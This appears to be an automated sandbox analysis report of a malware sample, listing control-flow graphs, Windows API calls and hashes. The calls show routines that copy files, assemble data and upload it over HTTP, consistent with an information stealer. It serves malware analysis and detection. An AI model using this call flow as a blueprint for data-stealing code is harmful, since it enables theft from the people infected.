                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • NtQueryInformationProcess, xrefs: 0041621A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                      • String ID: NtQueryInformationProcess
                                                                                                                                                                                                                                      • API String ID: 2238633743-2781105232
                                                                                                                                                                                                                                      • Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                                                                                                                                                      • Instruction ID: 1024ce913f91588aaf476b7e35ab3ad31cc185c195c2877b0ef9f81f7e935ec9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4CA16FB5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 339 404dc0-404ee1 call 416da0 call 404470 call 4155a0 call 4170d0 lstrlen call 4170d0 call 4155a0 call 416d40 * 5 InternetOpenA StrCmpCA 362 404ee3 339->362 363 404eea-404eee 339->363 362->363 364 404ef4-405007 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416f20 call 416fb0 call 416ea0 call 416e00 * 3 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 363->364 365 405578-40560a InternetCloseHandle call 415070 * 2 call 417040 * 4 call 416da0 call 416e00 * 5 call 413220 call 416e00 363->365 364->365 428 40500d-40501b 364->428 429 405029 428->429 430 40501d-405027 428->430 431 405033-405065 HttpOpenRequestA 429->431 430->431 432 40556b-405572 InternetCloseHandle 431->432 433 40506b-4054e5 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA call 415070 431->433 432->365 587 4054ea-405514 InternetReadFile 433->587 588 405516-40551d 587->588 589 40551f-405565 InternetCloseHandle 587->589 588->589 591 405521-40555f call 416fb0 call 416ea0 call 416e00 588->591 589->432 591->587
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                        • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                        • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                        • Part of subcall function 004155A0: CryptBinaryToStringA.CRYPT32(00000000,>N@,40000001,00000000,00000000), ref: 004155C0
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,04070728), ref: 00404ED9
                                                                                                                                                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00404FF4
                                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,04070628,?,04078280,00000000,00000000,00400100,00000000), ref: 00405058
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,?,",00000000,?,04070658,00000000,?,04077998,00000000,?,0041E098,00000000,?,00410996), ref: 004053EB
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 004053FF
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00405410
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00405417
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040542C
                                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00405443
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 0040545D
                                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040546A
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040547C
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405495
                                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 004054A5
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?), ref: 004054C2
                                                                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 004054D6
                                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00405501
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405565
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405572
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040557C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
                                                                                                                                                                                                                                      • String ID: ------$"$"$"$--$------$------$------$J&f
                                                                                                                                                                                                                                      • API String ID: 2633831070-3705675087
                                                                                                                                                                                                                                      • Opcode ID: 6549ced5a5c600e8a27fb6237dfbce87f6e9a99a23ea1def5b08f040f96c31ba
                                                                                                                                                                                                                                      • Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6549ced5a5c600e8a27fb6237dfbce87f6e9a99a23ea1def5b08f040f96c31ba
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 598 405610-4056cb call 416da0 call 404470 call 416d40 * 5 InternetOpenA StrCmpCA 613 4056d4-4056d8 598->613 614 4056cd 598->614 615 405c70-405c98 InternetCloseHandle call 4170d0 call 4094a0 613->615 616 4056de-405856 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416f20 call 416ea0 call 416e00 * 2 InternetConnectA 613->616 614->613 625 405cd7-405d3f call 415070 * 2 call 416da0 call 416e00 * 5 call 413220 call 416e00 615->625 626 405c9a-405cd2 call 416e20 call 416fb0 call 416ea0 call 416e00 615->626 616->615 700 40585c-40586a 616->700 626->625 701 405878 700->701 702 40586c-405876 700->702 703 405882-4058b5 HttpOpenRequestA 701->703 702->703 704 405c63-405c6a InternetCloseHandle 703->704 705 4058bb-405bdc call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 4170d0 lstrlen call 4170d0 lstrlen GetProcessHeap HeapAlloc call 4170d0 lstrlen call 4170d0 memcpy call 4170d0 lstrlen call 4170d0 * 2 lstrlen memcpy call 4170d0 lstrlen call 4170d0 HttpSendRequestA 703->705 704->615 814 405be2-405c0c InternetReadFile 705->814 815 405c17-405c5d InternetCloseHandle 814->815 816 405c0e-405c15 814->816 815->704 816->815 817 405c19-405c57 call 416fb0 call 416ea0 call 416e00 816->817 817->814
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                        • Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
                                                                                                                                                                                                                                        • Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,04070728), ref: 004056C3
                                                                                                                                                                                                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,040707A8,00000000,?,04077998,00000000,?,0041E0D8), ref: 00405B1E
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00405B2F
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
                                                                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00405B47
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00405B5C
                                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00405B73
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00405B85
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
                                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 00405BAB
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
                                                                                                                                                                                                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
                                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405C5D
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405C6A
                                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,04070628,?,04078280,00000000,00000000,00400100,00000000), ref: 004058A8
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00405C74
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                                                                                                                                                                                                                      • String ID: "$"$------$------$------$-A$-A$J&f
                                                                                                                                                                                                                                      • API String ID: 148854478-1022722094
                                                                                                                                                                                                                                      • Opcode ID: 29ebbbfae3119281cd9698afcc6b9225f01ace085e969b994f58abaeb61f6f03
                                                                                                                                                                                                                                      • Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 29ebbbfae3119281cd9698afcc6b9225f01ace085e969b994f58abaeb61f6f03
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 1271 40a030-40a04c call 417070 1274 40a05d-40a071 call 417070 1271->1274 1275 40a04e-40a05b call 416e20 1271->1275 1281 40a082-40a096 call 417070 1274->1281 1282 40a073-40a080 call 416e20 1274->1282 1280 40a0bd-40a128 call 416d40 call 416fb0 call 416ea0 call 416e00 call 415260 call 416f20 call 416ea0 call 416e00 * 2 1275->1280 1314 40a12d-40a134 1280->1314 1281->1280 1290 40a098-40a0b8 call 416e00 * 3 call 413220 1281->1290 1282->1280 1308 40a6cf-40a6d2 1290->1308 1315 40a170-40a184 call 416d40 1314->1315 1316 40a136-40a152 call 4170d0 * 2 CopyFileA 1314->1316 1321 40a231-40a314 call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416fb0 call 416ea0 call 416e00 * 2 1315->1321 1322 40a18a-40a22c call 416fb0 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 call 416f20 call 416ea0 call 416e00 call 416fb0 call 416ea0 call 416e00 1315->1322 1329 40a154-40a16e call 416da0 call 415bd0 1316->1329 1330 40a16c 1316->1330 1380 40a319-40a331 call 4170d0 1321->1380 1322->1380 1329->1314 1330->1315 1389 40a680-40a692 call 4170d0 DeleteFileA call 417040 1380->1389 1390 40a337-40a355 1380->1390 1401 40a697-40a6ca call 417040 call 416e00 * 5 call 413220 1389->1401 1399 40a666-40a676 1390->1399 1400 40a35b-40a36f GetProcessHeap RtlAllocateHeap 1390->1400 1408 40a67d 1399->1408 1402 40a372-40a382 1400->1402 1401->1308 1409 40a601-40a60e lstrlen 1402->1409 1410 40a388-40a42a call 416d40 * 6 call 417070 1402->1410 1408->1389 1411 40a610-40a642 lstrlen call 416da0 call 401500 call 404dc0 1409->1411 1412 40a655-40a663 memset 1409->1412 1450 40a42c-40a43b call 416e20 1410->1450 1451 40a43d-40a446 call 416e20 1410->1451 1428 40a647-40a650 call 416e00 1411->1428 1412->1399 1428->1412 1455 40a44b-40a45d call 417070 1450->1455 1451->1455 1458 40a470-40a479 call 416e20 1455->1458 1459 40a45f-40a46e call 416e20 1455->1459 1463 40a47e-40a48e call 4170b0 1458->1463 1459->1463 1466 40a490-40a498 call 416e20 1463->1466 1467 40a49d-40a5fc call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 2 call 4097f0 call 4170d0 lstrcat call 416e00 lstrcat call 416e00 * 6 1463->1467 1466->1467 1467->1402
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A
                                                                                                                                                                                                                                        • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0406DD00,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                        • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A510
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A532
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A554
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041DA94), ref: 0040A563
                                                                                                                                                                                                                                        • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                        • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                        • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(?), ref: 0040A605
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(?), ref: 0040A614
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040A65D
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0040A689
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2228671196-0
                                                                                                                                                                                                                                      • Opcode ID: ddc9db654cbe5268d6b62ae2fc0e237d04748efe997b257aa277234eefd120ab
                                                                                                                                                                                                                                      • Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ddc9db654cbe5268d6b62ae2fc0e237d04748efe997b257aa277234eefd120ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                        • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,040779F8,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
                                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
                                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040C958
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040C97A
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040C99C
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040CA02
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,00000000), ref: 0040CA24
                                                                                                                                                                                                                                      • lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33
                                                                                                                                                                                                                                        • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0406DD00,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                        • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(?), ref: 0040CA7A
                                                                                                                                                                                                                                      • lstrlen.KERNEL32(?), ref: 0040CA89
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040CAD2
                                                                                                                                                                                                                                        • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0040CAFE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.2490144933.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.2490144933.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_u5qk.jbxd
                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                      Similarity
